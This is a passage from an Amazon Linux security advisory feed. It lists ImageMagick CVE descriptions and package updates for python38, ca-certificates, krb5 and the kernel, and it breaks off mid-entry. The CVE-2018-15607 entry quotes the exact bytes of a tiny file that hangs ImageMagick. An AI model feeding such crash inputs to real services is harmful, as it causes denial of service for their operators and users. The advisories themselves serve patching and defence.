ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadBMPImage in coders/bmp.c.
CVE-2019-12979:
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the SyncImageSettings function in MagickCore/image.c. This is related to AcquireImage in magick/image.c.
CVE-2019-12978:
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the ReadPANGOImage function in coders/pango.c.
CVE-2019-12976:
It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the ReadPCLImage() function. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash.
An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-12975:
It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the WriteDPXImage() function. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-12974:
A NULL pointer dereference in the function ReadPANGOImage in coders/pango.c and the function ReadVIDImage in coders/vid.c in ImageMagick 7.0.8-34 allows remote attackers to cause a denial of service via a crafted image.
CVE-2019-11598:
In ImageMagick 7.0.8-40 Q16, there is a heap-based buffer over-read in the function WritePNMImage of coders/pnm.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file. This is related to SetGrayscaleImage in MagickCore/quantize.c.
CVE-2019-11597:
In ImageMagick 7.0.8-43 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file.
CVE-2019-11472:
ReadXWDImage in coders/xwd.c in the XWD image parsing component of ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (divide-by-zero error) by crafting an XWD image file in which the header indicates neither LSB first nor MSB first.
CVE-2019-11470:
The cineon parsing component in ImageMagick 7.0.8-26 Q16 allows attackers to cause a denial-of-service (uncontrolled resource consumption) by crafting a Cineon image with an incorrect claimed image size. This occurs because ReadCINImage in coders/cin.c lacks a check for insufficient image data in a file.
CVE-2019-10650:
In ImageMagick 7.0.8-36 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or information disclosure via a crafted image file.
CVE-2019-10131:
An off-by-one read vulnerability was discovered in ImageMagick in the formatIPTCfromBuffer function in coders/meta.c. A local attacker may use this flaw to read beyond the end of the buffer or to crash the program.
CVE-2018-9133:
ImageMagick 7.0.7-26 Q16 has excessive iteration in the DecodeLabImage and EncodeLabImage functions (coders/tiff.c), which results in a hang (tens of minutes) with a tiny PoC file. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted tiff file.
CVE-2018-8804:
WriteEPTImage in coders/ept.c in ImageMagick 7.0.7-25 Q16 allows remote attackers to cause a denial of service (MagickCore/memory.c double free and application crash) or possibly have unspecified other impact via a crafted file.
CVE-2018-20467:
In coders/bmp.c in ImageMagick before 7.0.8-16, an input file can result in an infinite loop and hang, with high CPU and memory consumption. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
CVE-2018-18544:
There is a memory leak in the function WriteMSLImage of coders/msl.c in ImageMagick 7.0.8-13 Q16, and the function ProcessMSLScript of coders/msl.c in GraphicsMagick before 1.3.31.
CVE-2018-16750:
In ImageMagick 7.0.7-29 and earlier, a memory leak in the formatIPTCfromBuffer function in coders/meta.c was found.
CVE-2018-16749:
In ImageMagick 7.0.7-29 and earlier, a missing NULL check in ReadOneJNGImage in coders/png.c allows an attacker to cause a denial of service (WriteBlob assertion failure and application exit) via a crafted file.
CVE-2018-16328:
In ImageMagick before 7.0.8-8, a NULL pointer dereference exists in the CheckEventLogging function in MagickCore/log.c.
CVE-2018-15607:
In ImageMagick 7.0.8-11 Q16, a tiny input file 0x50 0x36 0x36 0x36 0x36 0x4c 0x36 0x38 0x36 0x36 0x36 0x36 0x36 0x36 0x1f 0x35 0x50 0x00 can result in a hang of several minutes during which CPU and memory resources are consumed until ultimately an attempted large memory allocation fails. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
CVE-2018-14437:
ImageMagick 7.0.8-4 has a memory leak in parse8BIM in coders/meta.c.
CVE-2018-14436:
ImageMagick 7.0.8-4 has a memory leak in ReadMIFFImage in coders/miff.c.
CVE-2018-14435:
ImageMagick 7.0.8-4 has a memory leak in DecodeImage in coders/pcd.c.
CVE-2018-14434:
ImageMagick 7.0.8-4 has a memory leak for a colormap in WriteMPCImage in coders/mpc.c.
CVE-2018-13153:
A memory leak was discovered in ImageMagick in the XMagickCommand function in animate.c file. An array of strings, named filelist, is allocated on the heap but not released in case the function ExpandFilenames returns an error code.
CVE-2018-12600:
In ImageMagick 7.0.8-3 Q16, ReadDIBImage and WriteDIBImage in coders/dib.c allow attackers to cause an out of bounds write via a crafted file.
CVE-2018-12599:
In ImageMagick 7.0.8-3 Q16, ReadBMPImage and WriteBMPImage in coders/bmp.c allow attackers to cause an out of bounds write via a crafted file.
CVE-2018-11656:
In ImageMagick 7.0.7-20 Q16 x86_64, a memory leak vulnerability was found in the function ReadDCMImage in coders/dcm.c, which allows attackers to cause a denial of service via a crafted DCM image file.
CVE-2018-10805:
ImageMagick version 7.0.7-28 contains a memory leak in ReadYCBCRImage in coders/ycbcr.c.
CVE-2018-10804:
ImageMagick version 7.0.7-28 contains a memory leak in WriteTIFFImage in coders/tiff.c.
CVE-2018-10177:
An infinite loop has been found in the way ImageMagick reads Multiple-image Network Graphics (MNG) data. An attacker could exploit this to cause a denial of service via crafted MNG file.
CVE-2017-18273:
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-22, an infinite loop vulnerability was found in the function ReadTXTImage in coders/txt.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted image file that is mishandled in a GetImageIndexInList call.
CVE-2017-18271:
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-22, an infinite loop vulnerability was found in the function ReadMIFFImage in coders/miff.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted MIFF image file.
CVE-2017-18254:
A memory leak vulnerability has been discovered in ImageMagick in the WriteGIFImage function of coders/gif.c file. An attacker could use this flaw to cause a denial of service via a crafted file.
CVE-2017-18252:
An issue was discovered in ImageMagick 7.0.7. The MogrifyImageList function in MagickWand/mogrify.c allows attackers to cause a denial of service (assertion failure and application exit in ReplaceImageInList) via a crafted file.
CVE-2017-18251:
A memory leak vulnerability has been discovered in ImageMagick in the ReadPCDImage function of coders/pcd.c file. An attacker could use this flaw to cause a denial of service via a crafted file.
CVE-2017-12806:
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function format8BIM, which allows attackers to cause a denial of service.
CVE-2017-12805:
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function ReadTIFFImage, which allows attackers to cause a denial of service.
CVE-2017-11166:
The ReadXWDImage function in coders/xwd.c in ImageMagick 7.0.5-6 has a memory leak vulnerability that can cause memory exhaustion via a crafted length (number of color-map entries) field in the header of an XWD file.
CVE-2017-1000476:
In ImageMagick 7.0.7-12 Q16, a CPU exhaustion vulnerability was found in the function ReadDDSInfo in coders/dds.c, which allows attackers to cause a denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000476" title="" id="CVE-2017-1000476" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11166" title="" id="CVE-2017-11166" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12805" title="" id="CVE-2017-12805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12806" title="" id="CVE-2017-12806" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18251" title="" id="CVE-2017-18251" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18252" title="" id="CVE-2017-18252" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18254" title="" id="CVE-2017-18254" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18271" title="" id="CVE-2017-18271" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18273" title="" id="CVE-2017-18273" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10177" title="" id="CVE-2018-10177" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10804" title="" id="CVE-2018-10804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10805" title="" id="CVE-2018-10805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11656" title="" id="CVE-2018-11656" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12599" title="" id="CVE-2018-12599" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12600" title="" id="CVE-2018-12600" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13153" title="" id="CVE-2018-13153" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14434" title="" id="CVE-2018-14434" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14435" title="" id="CVE-2018-14435" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14436" title="" id="CVE-2018-14436" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14437" title="" id="CVE-2018-14437" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15607" title="" id="CVE-2018-15607" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16328" title="" id="CVE-2018-16328" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16749" title="" id="CVE-2018-16749" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16750" title="" id="CVE-2018-16750" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18544" title="" id="CVE-2018-18544" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20467" title="" id="CVE-2018-20467" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8804" title="" id="CVE-2018-8804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9133" title="" id="CVE-2018-9133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10131" title="" id="CVE-2019-10131" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10650" title="" id="CVE-2019-10650" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" title="" id="CVE-2019-11470" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" title="" id="CVE-2019-11472" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" 
title="" id="CVE-2019-11597" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" title="" id="CVE-2019-11598" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" title="" id="CVE-2019-12974" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" title="" id="CVE-2019-12975" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" title="" id="CVE-2019-12976" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" title="" id="CVE-2019-12978" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" title="" id="CVE-2019-12979" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13133" title="" id="CVE-2019-13133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13134" title="" id="CVE-2019-13134" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" title="" id="CVE-2019-13135" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" title="" id="CVE-2019-13295" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" title="" id="CVE-2019-13297" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" title="" id="CVE-2019-13300" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" title="" id="CVE-2019-13301" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" title="" id="CVE-2019-13304" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" title="" id="CVE-2019-13305" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" title="" id="CVE-2019-13306" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" title="" id="CVE-2019-13307" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" title="" id="CVE-2019-13309" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13310" title="" id="CVE-2019-13310" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" title="" id="CVE-2019-13311" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" title="" id="CVE-2019-13454" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14980" title="" id="CVE-2019-14980" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" title="" id="CVE-2019-14981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" title="" id="CVE-2019-15139" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" title="" id="CVE-2019-15140" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15141" title="" id="CVE-2019-15141" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" title="" id="CVE-2019-16708" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16709" title="" id="CVE-2019-16709" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" title="" id="CVE-2019-16710" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" title="" id="CVE-2019-16711" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" title="" id="CVE-2019-16712" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" title="" id="CVE-2019-16713" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17540" title="" id="CVE-2019-17540" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17541" title="" id="CVE-2019-17541" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" title="" id="CVE-2019-19948" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" title="" id="CVE-2019-19949" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" title="" id="CVE-2019-7175" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" title="" id="CVE-2019-7397" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" title="" id="CVE-2019-7398" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9956" title="" id="CVE-2019-9956" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php72-pecl-imagick" version="3.4.4" release="2.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pecl-imagick-3.4.4-2.10.amzn1.x86_64.rpm</filename></package><package name="php72-pecl-imagick-devel" version="3.4.4" release="2.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pecl-imagick-devel-3.4.4-2.10.amzn1.x86_64.rpm</filename></package><package name="php72-pecl-imagick-debuginfo" version="3.4.4" release="2.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pecl-imagick-debuginfo-3.4.4-2.10.amzn1.x86_64.rpm</filename></package><package name="php72-pecl-imagick-devel" version="3.4.4" release="2.10.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pecl-imagick-devel-3.4.4-2.10.amzn1.i686.rpm</filename></package><package name="php72-pecl-imagick-debuginfo" version="3.4.4" release="2.10.amzn1" epoch="0" 
arch="i686"><filename>Packages/php72-pecl-imagick-debuginfo-3.4.4-2.10.amzn1.i686.rpm</filename></package><package name="php72-pecl-imagick" version="3.4.4" release="2.10.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pecl-imagick-3.4.4-2.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1816</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1816: important priority package update for python38</title><issued date="2023-08-30 17:56:00" /><updated date="2023-09-09 00:34:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-40217:
An issue was discovered in Python before 3.8.18, 3.9.x before 3.9.18, 3.10.x before 3.10.13, and 3.11.x before 3.11.5. It primarily affects servers (such as HTTP servers) that use TLS client authentication. If a TLS server-side socket is created, receives data into the socket buffer, and then is closed quickly, there is a brief window where the SSLSocket instance will detect the socket as "not connected" and won't initiate a handshake, but buffered data will still be readable from the socket buffer. This data will not be authenticated if the server-side TLS peer is expecting client certificate authentication, and is indistinguishable from valid TLS stream data. Data is limited in size to the amount that will fit in the buffer. (The TLS connection cannot directly be used for data exfiltration because the vulnerable code path requires that the connection be closed on initialization of the SSLSocket.)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40217" title="" id="CVE-2023-40217" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python38" version="3.8.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-3.8.5-1.10.amzn1.x86_64.rpm</filename></package><package name="python38-debug" version="3.8.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-debug-3.8.5-1.10.amzn1.x86_64.rpm</filename></package><package name="python38-devel" version="3.8.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-devel-3.8.5-1.10.amzn1.x86_64.rpm</filename></package><package name="python38-debuginfo" version="3.8.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-debuginfo-3.8.5-1.10.amzn1.x86_64.rpm</filename></package><package name="python38-libs" version="3.8.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-libs-3.8.5-1.10.amzn1.x86_64.rpm</filename></package><package name="python38-tools" version="3.8.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-tools-3.8.5-1.10.amzn1.x86_64.rpm</filename></package><package name="python38-test" version="3.8.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-test-3.8.5-1.10.amzn1.x86_64.rpm</filename></package><package name="python38" version="3.8.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/python38-3.8.5-1.10.amzn1.i686.rpm</filename></package><package name="python38-debug" version="3.8.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/python38-debug-3.8.5-1.10.amzn1.i686.rpm</filename></package><package name="python38-debuginfo" version="3.8.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/python38-debuginfo-3.8.5-1.10.amzn1.i686.rpm</filename></package><package name="python38-tools" version="3.8.5" 
release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/python38-tools-3.8.5-1.10.amzn1.i686.rpm</filename></package><package name="python38-devel" version="3.8.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/python38-devel-3.8.5-1.10.amzn1.i686.rpm</filename></package><package name="python38-test" version="3.8.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/python38-test-3.8.5-1.10.amzn1.i686.rpm</filename></package><package name="python38-libs" version="3.8.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/python38-libs-3.8.5-1.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1817</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1817: important priority package update for ca-certificates</title><issued date="2023-08-30 17:56:00" /><updated date="2023-09-09 00:34:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-37920:
Certifi is a curated collection of Root Certificates for validating the trustworthiness of SSL certificates while verifying the identity of TLS hosts. Certifi prior to version 2023.07.22 recognizes "e-Tugra" root certificates. e-Tugra's root certificates were subject to an investigation prompted by reporting of security issues in their systems. Certifi 2023.07.22 removes root certificates from "e-Tugra" from the root store.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-37920" title="" id="CVE-2023-37920" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ca-certificates" version="2018.2.22" release="65.1.31.amzn1" epoch="0" arch="noarch"><filename>Packages/ca-certificates-2018.2.22-65.1.31.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1818</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1818: medium priority package update for krb5</title><issued date="2023-08-30 17:56:00" /><updated date="2023-09-09 00:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-36054:
lib/kadm5/kadm_rpc_xdr.c in MIT Kerberos 5 (aka krb5) before 1.20.2 and 1.21.x before 1.21.1 frees an uninitialized pointer. A remote authenticated user can trigger a kadmind crash. This occurs because _xdr_kadm5_principal_ent_rec does not validate the relationship between n_key_data and the key_data array count.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36054" title="" id="CVE-2023-36054" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="krb5-server" version="1.15.1" release="55.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-1.15.1-55.52.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.15.1" release="55.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-debuginfo-1.15.1-55.52.amzn1.x86_64.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.15.1" release="55.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-pkinit-openssl-1.15.1-55.52.amzn1.x86_64.rpm</filename></package><package name="krb5-libs" version="1.15.1" release="55.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-libs-1.15.1-55.52.amzn1.x86_64.rpm</filename></package><package name="krb5-devel" version="1.15.1" release="55.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-devel-1.15.1-55.52.amzn1.x86_64.rpm</filename></package><package name="krb5-workstation" version="1.15.1" release="55.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-workstation-1.15.1-55.52.amzn1.x86_64.rpm</filename></package><package name="libkadm5" version="1.15.1" release="55.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/libkadm5-1.15.1-55.52.amzn1.x86_64.rpm</filename></package><package name="krb5-server-ldap" version="1.15.1" release="55.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-ldap-1.15.1-55.52.amzn1.x86_64.rpm</filename></package><package name="krb5-workstation" version="1.15.1" release="55.52.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-workstation-1.15.1-55.52.amzn1.i686.rpm</filename></package><package name="krb5-debuginfo" version="1.15.1" release="55.52.amzn1" epoch="0" 
arch="i686"><filename>Packages/krb5-debuginfo-1.15.1-55.52.amzn1.i686.rpm</filename></package><package name="krb5-server-ldap" version="1.15.1" release="55.52.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-ldap-1.15.1-55.52.amzn1.i686.rpm</filename></package><package name="libkadm5" version="1.15.1" release="55.52.amzn1" epoch="0" arch="i686"><filename>Packages/libkadm5-1.15.1-55.52.amzn1.i686.rpm</filename></package><package name="krb5-server" version="1.15.1" release="55.52.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-1.15.1-55.52.amzn1.i686.rpm</filename></package><package name="krb5-devel" version="1.15.1" release="55.52.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-devel-1.15.1-55.52.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.15.1" release="55.52.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-libs-1.15.1-55.52.amzn1.i686.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.15.1" release="55.52.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-pkinit-openssl-1.15.1-55.52.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1819</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1819: medium priority package update for kernel</title><issued date="2023-08-30 17:56:00" /><updated date="2023-09-09 00:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-20588:
A division-by-zero error on some AMD processors can potentially return speculative data resulting in loss of confidentiality.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-20588" title="" id="CVE-2023-20588" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo-common-x86_64" version="4.14.322" release="170.538.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.322-170.538.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.322" release="170.538.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.322-170.538.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.322" release="170.538.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.322-170.538.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.322" release="170.538.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.322-170.538.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.322" release="170.538.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.322-170.538.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.322" release="170.538.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.322-170.538.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.322" release="170.538.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.322-170.538.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.322" release="170.538.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.322-170.538.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.322" release="170.538.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.322-170.538.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.322" release="170.538.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.322-170.538.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.322" release="170.538.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.322-170.538.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.322" release="170.538.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.322-170.538.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.322" release="170.538.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.322-170.538.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.322" release="170.538.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.322-170.538.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.322" release="170.538.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.322-170.538.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.322" release="170.538.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.322-170.538.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.322" release="170.538.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.322-170.538.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.322" release="170.538.amzn1" epoch="0" 